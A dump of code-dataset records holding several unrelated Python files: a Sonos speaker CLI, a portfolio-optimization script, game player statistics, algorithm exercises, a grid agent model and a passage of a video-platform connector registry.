\n                message = 'The search field \'{}\' is unknown. Only {} is '\\\n                          'allowed'.format(field, self._get_columns(data_type)[:-1])\n                raise TypeError(message)\n        return results\n\n    @staticmethod\n    def _play(sonos, data_type, results, *args):\n        \"\"\"Play music library item from search\"\"\"\n        action, number = args[1:]\n        # Check action\n        if action not in ['add', 'replace']:\n            message = 'Action must be \\'add\\' or \\'replace\\''\n            raise TypeError(message)\n\n        # Convert and check number\n        try:\n            number = int(number) - 1\n        except ValueError:\n            raise TypeError('Play number must be parseable as an integer')\n        if number not in range(len(results)):\n            if len(results) == 0:\n                message = 'No results to play from'\n            elif len(results) == 1:\n                message = 'Play number can only be 1'\n            else:\n                message = 'Play number has to be in the range from 1 to {}'.\\\n                    format(len(results))\n            raise TypeError(message)\n\n        # The last item in the search is the content dict in json\n        item_dict = json.loads(results[number][-1])\n        ml_classes = {'tracks': MLTrack, 'albums': MLAlbum,\n                      'artists': MLArtist, 'playlists': MLPlaylist}\n        item = ml_classes[data_type].from_dict(item_dict)\n\n        # Save state before queue manipulation\n        player_state = state(sonos)\n        out = 'Added to queue: \\'{}\\''\n        if action == 'replace':\n            sonos.clear_queue()\n            out = 'Queue replaced with: \\'{}\\''\n        sonos.add_to_queue(item)\n        if action == 'replace' and player_state == 'PLAYING':\n            sonos.play()\n\n        title = item.title\n        if hasattr(title, 'decode'):\n            title = title.encode('utf-8')\n        return out.format(title)\n\n    @staticmethod\n    def _print_results(data_type, results):\n        \"\"\"Print the results out nicely\"\"\"\n        print_patterns = {\n            u'tracks': '\\'{title}\\' on \\'{album}\\' by \\'{creator}\\'',\n            u'albums': '\\'{title}\\' by \\'{creator}\\'',\n            u'artists': '\\'{title}\\'',\n            u'playlists': '\\'{title}\\''\n        }\n        # Length of the results length number\n        index_length = len(str(len(results)))\n        for index, item in enumerate(results):\n            item_dict = json.loads(item[-1])\n            for key, value in item_dict.items():\n                if hasattr(value, 'decode'):\n                    item_dict[key] = value.encode('utf-8')\n            number = '({{: >{}}}) '.format(index_length).format(index + 1)\n            # pylint: disable=star-args\n            yield number + print_patterns[data_type].format(**item_dict)\n\n\n# current speaker (used only in interactive mode)\nCUR_SPEAKER = None\n# Instance of music library class\nMUSIC_LIB = MusicLibrary()\n\n\ndef main():\n    \"\"\" main switches between (non-)interactive mode \"\"\"\n    args = sys.argv[1:]\n\n    if args:\n        # process command and exit\n        process_cmd(args)\n    else:\n        # start interactive shell\n        shell()\n\n\ndef process_cmd(args):\n    \"\"\" Processes a single command \"\"\"\n\n    cmd = args.pop(0).lower()\n\n    if cmd not in COMMANDS:\n        err('Unknown command \"{cmd}\"'.format(cmd=cmd))\n        err(get_help())\n        return False\n\n    func, args = _check_args(cmd, args)\n\n    try:\n        result = _call_func(func, args)\n    except TypeError as ex:\n        err(ex)\n        return\n\n    # colorama.init() takes over stdout/stderr to give cross-platform colors\n    if colorama:\n        colorama.init()\n\n    # process output\n    if result is None:\n        pass\n\n    elif hasattr(result, '__iter__'):\n        try:\n            for line in result:\n                print(line)\n        except TypeError as ex:\n            err(ex)\n            return\n\n    else:\n        print(result)\n\n    # Release stdout/stderr from colorama\n    if colorama:\n        colorama.deinit()\n\n\ndef _call_func(func, args):\n    \"\"\" handles str-based functions and calls appropriately \"\"\"\n\n    # determine how to call function\n    if isinstance(func, str):\n        sonos = args.pop(0)\n        method = getattr(sonos, func)\n        return method(*args) # pylint: disable=star-args
\n\n    else:\n        return func(*args) # pylint: disable=star-args\n\n\ndef _check_args(cmd, args):\n    \"\"\" checks if func is called for a speaker and updates 'args' \"\"\"\n\n    req_ip, func = COMMANDS[cmd]\n\n    if not req_ip:\n        return func, args\n\n    if not CUR_SPEAKER:\n        if not args:\n            err('Please specify a speaker IP for \"{cmd}\".'.format(cmd=cmd))\n            return None, None\n        else:\n            speaker_spec = args.pop(0)\n            sonos = soco.SoCo(speaker_spec)\n            args.insert(0, sonos)\n    else:\n        args.insert(0, CUR_SPEAKER)\n\n    return func, args\n\n\ndef shell():\n    \"\"\" Start an interactive shell \"\"\"\n\n    if readline is not None:\n        readline.parse_and_bind('tab: complete')\n        readline.set_completer(complete_command)\n        readline.set_completer_delims(' ')\n\n    while True:\n        try:\n            # Not sure why this is necessary, as there is a player_name attr\n            # pylint: disable=no-member\n            if CUR_SPEAKER:\n                line = input('socos({speaker}|{state})> '.format(\n                    speaker=CUR_SPEAKER.player_name,\n                    state=state(CUR_SPEAKER).title()).encode('utf-8'))\n            else:\n                line = input('socos> ')\n        except EOFError:\n            print('')\n            break\n        except KeyboardInterrupt:\n            print('')\n            continue\n\n        line = line.strip()\n        if not line:\n            continue\n\n        try:\n            args = shlex.split(line)\n        except ValueError as value_error:\n            err('Syntax error: %(error)s' % {'error': value_error})\n            continue\n\n        try:\n            process_cmd(args)\n        except KeyboardInterrupt:\n            err('Keyboard interrupt.')\n        except EOFError:\n            err('EOF.')\n\n\ndef complete_command(text, context):\n    \"\"\" auto-complete commands\n\n    text is the text to be auto-completed\n    context is an index, increased for every call for \"text\" to get next match\n    \"\"\"\n    matches = [cmd for cmd in COMMANDS.keys() if cmd.startswith(text)]\n    return matches[context]\n\n\ndef adjust_volume(sonos, operator):\n    \"\"\" Adjust the volume up or down with a factor from 1 to 100 \"\"\"\n    factor = get_volume_adjustment_factor(operator)\n    if not factor:\n        return False\n\n    vol = sonos.volume\n\n    if operator[0] == '+':\n        if (vol + factor) > 100:\n            factor = 1\n        sonos.volume = (vol + factor)\n        return sonos.volume\n    elif operator[0] == '-':\n        if (vol - factor) < 0:\n            factor = 1\n        sonos.volume = (vol - factor)\n        return sonos.volume\n    else:\n        err(\"Valid operators for volume are + and -\")\n\n\ndef get_volume_adjustment_factor(operator):\n    \"\"\" get the factor to adjust the volume with \"\"\"\n    factor = 1\n    if len(operator) > 1:\n        try:\n            factor = int(operator[1:])\n        except ValueError:\n            err(\"Adjustment factor for volume has to be an int.\")\n            return\n    return factor\n\n\ndef get_current_track_info(sonos):\n    \"\"\" Show the current track \"\"\"\n    track = sonos.get_current_track_info()\n    return (\n        \"Current track: %s - %s. From album %s. This is track number\"\n        \" %s in the playlist. It is %s minutes long.\" % (\n            track['artist'],\n            track['title'],\n            track['album'],\n            track['playlist_position'],\n            track['duration'],\n        )\n    )\n\n\ndef get_queue(sonos):\n    \"\"\" Show the current queue \"\"\"\n    queue = sonos.get_queue()\n\n    # pylint: disable=invalid-name\n    ANSI_BOLD = '\\033[1m'\n    ANSI_RESET = '\\033[0m'\n\n    current = int(sonos.get_current_track_info()['playlist_position'])\n\n    queue_length = len(queue)\n    padding = len(str(queue_length))\n\n    for idx, track in enumerate(queue, 1):\n        if idx == current:\n            color = ANSI_BOLD\n        else:\n            color = ANSI_RESET\n\n        idx = str(idx).rjust(padding)\n        yield (\n            \"%s%s: %s - %s. From album %s.\" % (
From album %s.\" % (\n color,\n idx,\n track.creator,\n track.title,\n track.album,\n )\n )\n\n\ndef err(message):\n \"\"\" print an error message \"\"\"\n print(message, file=sys.stderr)\n\n\ndef play_index(sonos, index):\n \"\"\" Play an item from the playlist \"\"\"\n queue_length = len(sonos.get_queue())\n try:\n index = int(index) - 1\n if index >= 0 and index < queue_length:\n position = sonos.get_current_track_info()['playlist_position']\n current = int(position) - 1\n if index != current:\n return sonos.play_from_queue(index)\n else:\n raise ValueError()\n except ValueError():\n return \"Index has to be a integer within \\\n the range 1 - %d\" % queue_length\n\n\ndef list_ips():\n \"\"\" List available devices \"\"\"\n sonos = soco.SonosDiscovery()\n return sonos.get_speaker_ips()\n\n\ndef speaker_info(sonos):\n \"\"\" Information about a speaker \"\"\"\n infos = sonos.get_speaker_info()\n return ('%s: %s' % (i, infos[i]) for i in infos)\n\n\ndef volume(sonos, *args):\n \"\"\" Change or show the volume of a device \"\"\"\n if args:\n operator = args[0].lower()\n adjust_volume(sonos, operator)\n\n return sonos.volume\n\n\ndef exit_shell():\n \"\"\" Exit socos \"\"\"\n sys.exit(0)\n\n\ndef play(sonos, *args):\n \"\"\" Start playing \"\"\"\n if args:\n idx = args[0]\n play_index(sonos, idx)\n else:\n sonos.play()\n return get_current_track_info(sonos)\n\n\ndef play_next(sonos):\n \"\"\" Play the next track \"\"\"\n sonos.next()\n return get_current_track_info(sonos)\n\n\ndef play_previous(sonos):\n \"\"\" Play the previous track \"\"\"\n sonos.previous()\n return get_current_track_info(sonos)\n\n\ndef state(sonos):\n \"\"\" Get the current state of a device / group \"\"\"\n return sonos.get_current_transport_info()['current_transport_state']\n\n\ndef set_speaker(ip_address):\n \"\"\" set the current speaker for the shell session \"\"\"\n # pylint: disable=global-statement,fixme\n # TODO: this should be refactored into a class with instance-wide state\n global CUR_SPEAKER\n CUR_SPEAKER = soco.SoCo(ip_address)\n\n\ndef unset_speaker():\n \"\"\" resets the current speaker for the shell session \"\"\"\n global CUR_SPEAKER # pylint: disable=global-statement\n CUR_SPEAKER = None\n\n\ndef get_help(command=None):\n \"\"\" Prints a list of commands with short description \"\"\"\n\n def _cmd_summary(item):\n \"\"\" Format command name and first line of docstring \"\"\"\n name, func = item[0], item[1][1]\n if isinstance(func, str):\n func = getattr(soco.SoCo, func)\n doc = getattr(func, '__doc__') or ''\n doc = doc.split('\\n')[0].lstrip()\n return ' * {cmd:12s} {doc}'.format(cmd=name, doc=doc)\n\n if command and command in COMMANDS:\n func = COMMANDS[command][1]\n doc = getattr(func, '__doc__') or ''\n doc = [line.lstrip() for line in doc.split('\\n')]\n out = '\\n'.join(doc)\n else:\n texts = ['Available commands:']\n # pylint: disable=bad-builtin\n texts += map(_cmd_summary, COMMANDS.items())\n out = '\\n'.join(texts)\n return out\n\n\n# COMMANDS indexes commands by their name. 
Each command is a 2-tuple of\n# (requires_ip, function) where function is either a callable, or a\n# method name to be called on a SoCo instance (depending on requires_ip)\n# If requires_ip is False, function must be a callable.\nCOMMANDS = OrderedDict((\n # cmd req IP func\n # pylint: disable=bad-whitespace\n ('list', (False, list_ips)),\n ('partymode', (True, 'partymode')),\n ('info', (True, speaker_info)),\n ('play', (True, play)),\n ('pause', (True, 'pause')),\n ('stop', (True, 'stop')),\n ('next', (True, play_next)),\n ('previous', (True, play_previous)),\n ('current', (True, get_current_track_info)),\n ('queue', (True, get_queue)),\n ('volume', (True, volume)),\n ('state', (True, state)),\n ('ml_index', (True, MUSIC_LIB.index)),\n ('ml_tracks', (True, MUSIC_LIB.tracks)),\n ('ml_albums', (True, MUSIC_LIB.albums)),\n ('ml_artists', (True, MUSIC_LIB.artists)),\n ('ml_playlists', (True, MUSIC_LIB.playlists)),\n ('exit', (False, exit_shell)),\n ('set', (False, set_speaker)),\n ('unset', (False, unset_speaker)),\n ('help', (False, get_help)),\n))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"socos.py","file_name":"socos.py","file_ext":"py","file_size_in_byte":23755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"612342666","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ncovarMat = pd.read_csv('/home/hassan/Downloads/Book1.csv')\nreturns = pd.read_csv('/home/hassan/Downloads/Book2.csv')\ntBills = pd.read_csv('/home/hassan/Downloads/Book3.csv')\ntBills.drop(0,inplace=True)\n\nsP500 = pd.read_csv('/home/hassan/Downloads/Book4.csv')\nasset_pctChange_daily = pd.read_csv('/home/hassan/Downloads/Book5.csv')\nasset_pctChange_daily.drop('S&P500',axis=1,inplace=True)\nomega = np.array(covarMat)\nreturns = returns[['Stock code' , 'avg_expected_return']]\nexp_returns = np.array(returns['avg_expected_return'])\nassets = 20\nassets_ref = 2\nasset_pctChange = np.array(asset_pctChange_daily)\n\n\n\n\nrisk_free_rate = 0.021\ntBills.drop('Unnamed: 2', axis=1, inplace=True)\n\nfor i in range(len(tBills)):\n\ttBills.loc[i+1,'Tbills'] = tBills.loc[i+1,'Tbills']/100\n\n\n\ntBills_sP500 = tBills.merge(sP500, on='Time Period')\npctCh_sP500 = tBills_sP500['S&P 500'].pct_change()\ndf_pctCh_sP500 = pd.DataFrame({'pctCh_sP500': pctCh_sP500})\n\n\npctCh_sP500_tBills = df_pctCh_sP500.join(tBills_sP500['Tbills'])\n\nch1 = pctCh_sP500_tBills.describe()\nch2 = pctCh_sP500_tBills.corr()\ncorr_ref = ch2.loc['Tbills','pctCh_sP500']\n\n\nmeans_ref = np.array(ch1.loc['mean',ch1.columns])\nstd_ref = np.array(ch1.loc['std',ch1.columns])\nlabels_ref = np.array(ch1.columns)\nref_cov = corr_ref*std_ref[0]*std_ref[1]\n\n\nprint(' ' , labels_ref)\nprint('mean : ' , means_ref)\nprint('std : ' , std_ref)\ntbill_ret = means_ref[1]\nsP500_ret = means_ref[0]\ntbill_risk = std_ref[1]\nsP500_risk = std_ref[0]\n\nprint('reference portfolio covariance : ', ref_cov)\n'''________________Monte Carlo Simulation_________________'''\nnumOfPortfolios = 75000\nreturns_risks = np.array([[0,0]])\nweights_hist = np.array([[0 for i in range(assets)]])\nsharpeRatios = np.array([0])\n\n\n\nreturns_risks_ref = np.array([[0,0]])\nweights_hist_ref = np.array([[0 for i in range(assets_ref)]])\nsharpeRatios_ref = np.array([0])\ncovarMat_ref = np.array(pctCh_sP500_tBills.cov())\n\n\n'''___ Monte Carlo Simulation for Optimal Portfolio calculation___'''\nfor i in range(numOfPortfolios):\n\tw = np.random.random(size=assets)\n\tw = np.absolute(w)\n\tw /= 
sum(w)\n\tfirst = omega.dot(w)\n\tvariance = np.dot(w, first)\n\tvolatility = np.sqrt(variance)\n\treturn_portfolio = np.dot(w,exp_returns)\n\tdiff = return_portfolio - risk_free_rate\n\tsharpeRatios = np.append(sharpeRatios, diff/volatility)\n\treturns_risks = np.append(returns_risks,\n\t\t [[return_portfolio,volatility]],\n\t\t axis=0)\n\tweights_hist = np.append(weights_hist,\n\t\t\t\t\t\t [[i for i in w]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks = np.delete(returns_risks,(0),axis=0)\n\tweights_hist = np.delete(weights_hist,(0),axis=0)\n\tsharpeRatios = np.delete(sharpeRatios,(0),axis=0)\n\tmax_sharpe = max(sharpeRatios)\n\tmax_sharpe_index = np.argmax(sharpeRatios)\n\tweights_optimal = weights_hist[max_sharpe_index]\n\n\nexp_returns_ref = np.array([sP500_ret , tbill_ret])\n\nfor i in range(numOfPortfolios):\n\tw_ref = np.random.random(size=assets_ref)\n\tw_ref = np.absolute(w_ref)\n\tw_ref /= sum(w_ref)\n\tfirst_ref = np.dot(covarMat_ref,w_ref)\n\tvariance_ref = np.dot(w_ref, first_ref)\n\tvolatility_ref = np.sqrt(variance_ref)\n\treturn_portfolio_ref = np.dot(w_ref,exp_returns_ref)\n\tdiff_ref = return_portfolio_ref - risk_free_rate\n\tsharpeRatios_ref = np.append(sharpeRatios_ref, diff_ref/volatility_ref)\n\treturns_risks_ref = np.append(returns_risks_ref,\n\t\t [[return_portfolio_ref, volatility_ref]],\n\t\t axis=0)\n\tweights_hist_ref = np.append(weights_hist_ref,\n\t\t\t\t\t\t [[i for i in w_ref]],\n\t\t\t\t\t\t axis=0)\nelse : \n\treturns_risks_ref = np.delete(returns_risks_ref,(0),axis=0)\n\tweights_hist_ref = np.delete(weights_hist_ref,(0),axis=0)\n\tsharpeRatios_ref = np.delete(sharpeRatios_ref,(0),axis=0)\n\tmax_sharpe_ref = max(sharpeRatios_ref)\n\tmax_sharpe_index_ref = np.argmax(sharpeRatios_ref)\n\tweights_optimal_ref = weights_hist_ref[max_sharpe_index_ref]\n\n\n\t\nprint('\\n \\n')\n\nprint('the maximum sharpe ratio is : ', max_sharpe)\nprint('optimal returns & risk : ' , returns_risks[max_sharpe_index])\nreturn_risk_opt = returns_risks[max_sharpe_index]\nreturn_risk_refOpt = returns_risks_ref[max_sharpe_index_ref]\n\nprint('\\n')\nw1_ref_port = returns_risks[max_sharpe_index,0]/tbill_ret\nprint(str(returns_risks[max_sharpe_index,0])+'/'+str(tbill_ret))\nprint('\\n')\nprint('The reference portfolio needs a '+str(w1_ref_port)+' times greater investment to match our portfolio\\'s return')\nprint('\\n')\nrisk_ref = w1_ref_port*tbill_risk\nriskComparison_port2ref = returns_risks[max_sharpe_index,1]/risk_ref\nprint('Our portfolio is '+str(riskComparison_port2ref)+' times riskier than the reference portfolio')\nprint(str(returns_risks[max_sharpe_index,1])+'/'+str(risk_ref))\n\nprint('\\n \\n')\nprint('the maximum sharpe ratio for ref portfolio is : ', max_sharpe_ref)\nprint('optimal returns & risk for ref portfolio is : ' , returns_risks_ref[max_sharpe_index_ref])\nprint('weights for optimal ref portfolio are : ' , weights_optimal_ref)\nprint('\\n \\n ')\nprint('comparing sharpe ratios : ' , max_sharpe , max_sharpe_ref )\n\n\n\nportfolio_pctChange = asset_pctChange.dot(weights_optimal)\nportfolio_pctChange_ref = np.array(pctCh_sP500_tBills['Tbills']*w1_ref_port)\n\ndf_pctCh_Optport_ref = pd.DataFrame({'Opt Pf Pct Change' : portfolio_pctChange ,\n\t 'Ref Pf Pct Change' : portfolio_pctChange_ref})\n\n\nsharpe_ratio_ref_m = (return_risk_opt[0]-risk_free_rate)/risk_ref\n\n\ndf_corr_portRef = df_pctCh_Optport_ref.corr()\ndf_covMat_portRef = df_pctCh_Optport_ref.cov()\ncorrelation_OptPort_ref = df_corr_portRef.loc['Opt Pf Pct Change' , 'Ref Pf Pct 
Change']\n\n\ndf_weights_optimal = pd.DataFrame({'optimal port weights' : weights_optimal})\ndf_weights_optimal_ref = pd.DataFrame({'optimal ref_port weights' : weights_optimal_ref})\n\ndf_return_risk_opt = pd.DataFrame({'optimal portfolio' : np.append(return_risk_opt,max_sharpe),\n\t 'ref optimal portfolio' : np.append(return_risk_refOpt,max_sharpe_ref),\n\t 'ref retMatch portfolio' : [return_risk_opt[0], risk_ref, sharpe_ratio_ref_m ]},\n\t index = ['return','risk','sharpe ratio'] )\n\ndf_misc = pd.DataFrame({ 'Others' : [correlation_OptPort_ref , w1_ref_port , riskComparison_port2ref] },\n\t index = ['corr OptPort & Ref_m' , 'return scale OptPort/refPort', 'risk scale OptPort/refPort'])\n\ndf_corr_portRef.to_csv('corr_matrix_optPort_ref_m.csv')\ndf_covMat_portRef.to_csv('VaCov_mat_optPort_ref_m.csv')\ndf_weights_optimal.to_csv('optPort_weights.csv')\ndf_weights_optimal_ref.to_csv('optRef_weights.csv')\ndf_misc.to_csv('misc.csv')\ndf_return_risk_opt.to_csv('ret_risk_sharpe_optPort_optref_mref.csv')\n\n\nprint(df_return_risk_opt)\n\nx = np.linspace(0, 0.4, numOfPortfolios)\nx2 = np.linspace(0, 0.05, numOfPortfolios)\n\nplt.plot(x, max_sharpe*x + risk_free_rate,label='Our Capital Market Line' ,color='black')\nplt.plot(x2, max_sharpe_ref*x2 + risk_free_rate,label='ref Capital Market Line' ,color='green')\n\n\n\nplt.scatter(return_risk_opt[1],\n\t\t\treturn_risk_opt[0],\n\t\t\tlabel='Optimal Portfolio',\n\t\t\tc='c',\n\t\t\tmarker='x',\n\t\t\ts=200)\nplt.scatter(returns_risks[:,1],\n\t returns_risks[:,0],\n\t label='BitCoin Portfolio Frontier',\n\t c='r',\n\t marker='o')\nplt.scatter(returns_risks_ref[:,1],\n\t returns_risks_ref[:,0],\n\t label='Reference Portfolio Frontier',\n\t c='b',\n\t marker='o')\n\n\nplt.xlabel('Risk')\nplt.ylabel('Expected Return')\nplt.legend(loc=4, prop={'size': 12})\nplt.title('Efficient Frontiers')\nprint(return_risk_opt)\nplt.show()\n\n\n\n","sub_path":"Optimal_port.py","file_name":"Optimal_port.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165899846","text":"#!/usr/bin/env python3\nfrom chiller_essential import *\nimport datetime\n\naPlayers=[]\n\ndef CalcKD(k, d):\n if k == 0:\n return str(0)\n if d == 0:\n return str(k)\n return str(\"%.2f\" % (k / d))\n\ndef BestTime(t1, t2):\n t = min(t1,t2)\n if t == 0:\n return max(t1, t2) #if no time yet --> set the highest\n return t #if captured already use lowest time\n\ndef A_Best(a1, a2):\n if a1 == \"\":\n return a2\n elif a2 == \"\":\n return a1\n if a1 < a2:\n return a1 # use oldest time\n return a2\n\nclass Player:\n #def __init__(self, name, time=0.0, spree=0, team=\"\", a_haxx0r = \"\", a_blazeit = \"\", a_satan = \"\", a_virgin = \"\"):\n def __init__(self, name, time=0.0, spree=0, team=\"\"):\n self.name = name\n self.kills = 0\n self.deaths = 0\n self.flag_grabs = 0\n self.flag_caps_red = 0\n self.flag_caps_blue = 0\n self.flag_time = time\n self.flagger_kills = 0\n self.best_spree = spree\n self.wins = 0\n self.looses = 0\n self.a_haxx0r = \"\"\n self.a_blazeit = \"\"\n self.a_satan = \"\"\n self.a_virgin = \"\"\n '''\n self.a_haxx0r = a_haxx0r\n self.a_blazeit = a_blazeit\n self.a_satan = a_satan\n self.a_virgin = a_virgin\n '''\n #round variables (not saved)\n self.killingspree = 0\n self.IsFlagger = False\n self.team = team\n self.LastChat = datetime.datetime.now()\n self.MuteScore = 0\n self.IsMuted = False\n def __add__(self, other):\n tmp_player = Player(self.name)\n tmp_player.kills = self.kills + 
other.kills\n        tmp_player.deaths = self.deaths + other.deaths\n        tmp_player.flag_grabs = self.flag_grabs + other.flag_grabs\n        tmp_player.flag_caps_red = self.flag_caps_red + other.flag_caps_red\n        tmp_player.flag_caps_blue = self.flag_caps_blue + other.flag_caps_blue\n        tmp_player.flag_time = BestTime(self.flag_time, other.flag_time)\n        tmp_player.flagger_kills = self.flagger_kills + other.flagger_kills\n        tmp_player.best_spree = max(self.best_spree, other.best_spree)\n        tmp_player.wins = self.wins + other.wins\n        tmp_player.looses = self.looses + other.looses\n        tmp_player.a_haxx0r = A_Best(self.a_haxx0r, other.a_haxx0r)\n        tmp_player.a_blazeit = A_Best(self.a_blazeit, other.a_blazeit)\n        tmp_player.a_satan = A_Best(self.a_satan, other.a_satan)\n        tmp_player.a_virgin = A_Best(self.a_virgin, other.a_virgin)\n        \"\"\"\n        say(\"== merging '\" + other.name + \"' -> into -> '\" + self.name + \"' ===\")\n        say(\"src: \")\n        say(\"k/d: \" + str(other.kills) + \" g/r/b/t: \" + str(other.flag_grabs) + \"/\" + str(other.flag_caps_red) + \"/\" + str(other.flag_caps_blue) + \"/\" + str(other.flag_time))\n        say(\"dst: \")\n        say(\"k/d: \" + str(self.kills) + \" g/r/b/t: \" + str(self.flag_grabs) + \"/\" + str(self.flag_caps_red) + \"/\" + str(self.flag_caps_blue) + \"/\" + str(self.flag_time))\n        say(\"merge: \")\n        say(\"k/d: \" + str(tmp_player.kills) + \" g/r/b/t: \" + str(tmp_player.flag_grabs) + \"/\" + str(tmp_player.flag_caps_red) + \"/\" + str(tmp_player.flag_caps_blue) + \"/\" + str(tmp_player.flag_time))\n        \"\"\"\n        return tmp_player\n    def ShowStats(self):\n        say(\"[stats] '\" + str(self.name) + \"' kills: \" + str(self.kills) + \" deaths: \" + str(self.deaths) + \" killingspree: \" + str(self.best_spree))\n        #say(\"[stats] '\" + self.name + \"' flagtime: \" + str(self.flag_time))\n    def ShowStatsRound(self):\n        say(\"[round-stats] '\" + str(self.name) + \"' kd: \" + CalcKD(self.kills,self.deaths) + \" (\" + str(self.kills) + \"/\" + str(self.deaths) + \")\")\n\n","sub_path":"src/base_player.py","file_name":"base_player.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499461046","text":"# -*- coding:utf-8 -*-\nclass Solution1:\n    def cutRope(self, number):\n        # write code here\n        if number<=1:\n            return 0\n        elif number ==2:\n            return 1\n        elif number == 3:\n            return 2\n\n        products = [0,1,2,3]\n        for i in range(4,number+1):\n            best = 0\n            for j in range(1,int(i/2)+1):\n                product = products[j]*products[i-j]\n                if product > best:\n                    best = product\n\n            products.append(best)\n\n        return best\n\n\nclass Solution2:\n    def cutRope(self, number):\n        # write code here\n        if number<=1:\n            return 0\n        elif number ==2:\n            return 1\n        elif number == 3:\n            return 2\n\n        threetimes = int(number/3)\n
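        # editor's note: segments of length 3 maximize the product; when the\n        # remainder is 1, trade one 3 for a 2+2 split (since 2*2 > 3*1).\n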
Expression Add Operators\n# https://leetcode.com/problems/expression-add-operators/description/\n\n# Solution: DFS\n# 1)For every position between 2 digits, there are 4 possibilities:\n# no operator; operator +, operator -, operator *\n# Try all of them \n# 2) if using python: eval result string directly to get value,\n# if not using python, eval on the go, special care to operator *.\n# 3) special care to digit 0, since 0 can't be starting digit for num except for 0\n\nOPS = ['+', '-', '*']\n\ndef constructExpression(num, ops):\n ans = []\n for i in xrange(len(num)):\n ans.append(ops[i])\n ans.append(num[i])\n\n return ''.join(ans)\n\ndef generateOperators(num, target, ops, pos, zero_start, ans):\n if pos == len(num):\n expression = constructExpression(num, ops)\n res = eval(expression)\n if res == target:\n ans.append(expression)\n return\n\n # don't insert op\n if not zero_start:\n ops[pos] = ''\n generateOperators(num, target, ops, pos+1, False, ans)\n\n # insert op\n zero_start = num[pos] == '0'\n for op in OPS:\n ops[pos] = op\n generateOperators(num, target, ops, pos+1, zero_start, ans)\n\n return\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n ops = [''] * len(num)\n ans = []\n\n zero_start = num[0] == '0'\n generateOperators(num, target, ops, 1, zero_start, ans)\n\n return ans\n\ns = Solution()\nans = s.addOperators(\"123456789\", 45)\nprint(ans)\n ","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46197257","text":"import constants\nfrom random import randint, shuffle\nfrom agent import Agent\n\n\nclass GridModel(object):\n\n def __init__(self):\n self.agents = []\n\n def update(self):\n indices = list(range(len(self.agents)))\n shuffle(indices)\n for index in indices: # update agents in random order\n agent = self.agents[index]\n agent.set_neighbors(self.check_neighbors(agent.x, agent.y))\n if agent.current_activity == constants.SEARCH_AGENT:\n agent.set_dir(self.find_path(agent))\n agent.update(self.get_random_target(index))\n\n def get_random_target(self, agent_idx):\n target_idx = randint(0, (len(self.agents) - 1))\n while target_idx == agent_idx:\n target_idx = randint(0, (len(self.agents) - 1))\n return self.agents[target_idx]\n\n def check_neighbors(self, x, y):\n dirs = [None, None, None, None]\n dirs[constants.NORTH] = self.agent_at(x, y - 1)\n dirs[constants.EAST] = self.agent_at(x + 1, y)\n dirs[constants.SOUTH] = self.agent_at(x, y + 1)\n dirs[constants.WEST] = self.agent_at(x - 1, y)\n return dirs\n\n def agent_at(self, x, y):\n for agent in self.agents:\n if agent.x == x and agent.y == y:\n return agent\n return None\n\n def get_number_of_agents(self):\n return len(self.agents)\n\n def add_agent(self, id, no_agents):\n x = randint(0, constants.TILES_X - 1)\n y = randint(0, constants.TILES_Y - 1)\n self.agents.append(Agent(x, y, id, no_agents))\n\n def find_path(self, agent):\n start = (agent.x, agent.y)\n end = (agent.target_agent.x, agent.target_agent.y)\n\n explored = []\n queue = [start]\n levels = {}\n levels[start] = 0\n visited = [start]\n\n while queue:\n pos = queue.pop(0)\n x = pos[0]\n y = pos[1]\n explored.append(pos)\n neighbours = [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]\n for neighbour in neighbours:\n if neighbour[0] < 0 or neighbour[0] >= constants.TILES_X or neighbour[1] < 0 or 
neighbour[1] \\\n                        >= constants.TILES_Y:\n                    continue\n                if self.agent_at(neighbour[0], neighbour[1]) and not neighbour == end:\n                    continue\n                if neighbour not in visited:\n                    queue.append(neighbour)\n                    visited.append(neighbour)\n\n                    levels[neighbour] = levels[pos] + 1\n\n        print(levels[start])\n        print(levels[end])\n\n\n\n","sub_path":"gridmodel.py","file_name":"gridmodel.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510770218","text":"from functools import partial\n\nfrom commonspy.logging import log_info\n\nfrom connector import config\nfrom connector.facebook import upload_video_to_facebook, update_video_on_facebook, unpublish_video_on_facebook, \\\n    delete_video_on_facebook\nfrom connector.youtube_mcn import upload_video_to_youtube_mcn, delete_video_on_youtube_mcn, unpublish_video_on_youtube_mcn, \\\n    update_video_on_youtube_mcn\nfrom connector.youtube_direct import upload_video_to_youtube_direct, delete_video_on_youtube_direct, \\\n    unpublish_video_on_youtube_direct, update_video_on_youtube_direct\n\n\ndef test_mode_action(action, video, registry):\n    log_info(\"DRY MODE action: '%s' | video: %s | registry: %s\" % (action, video.__dict__, registry.__dict__))\n\nregistered_platforms = {\n    'facebook': {\n        'upload': upload_video_to_facebook,\n        'update': update_video_on_facebook,\n        'unpublish': unpublish_video_on_facebook,\n        'delete': delete_video_on_facebook\n    },\n    'youtube': {\n        'upload': upload_video_to_youtube_mcn,\n        'update': update_video_on_youtube_mcn,\n        'unpublish': unpublish_video_on_youtube_mcn,\n        'delete': delete_video_on_youtube_mcn\n    },\n    'youtube_direct': {\n        'upload': upload_video_to_youtube_direct,\n        'update': update_video_on_youtube_direct,\n        'unpublish': unpublish_video_on_youtube_direct,\n        'delete': delete_video_on_youtube_direct\n    }\n    }\n\ntest_mode_platforms = {\n    'facebook': {\n        'upload': partial(test_mode_action, 'facebook upload'),\n        'update': partial(test_mode_action, 'facebook update'),\n        'unpublish': partial(test_mode_action, 'facebook unpublish'),\n        'delete': partial(test_mode_action, 'facebook delete')\n    },\n    'youtube': {\n        'upload': partial(test_mode_action, 'youtube upload'),\n        'update': partial(test_mode_action, 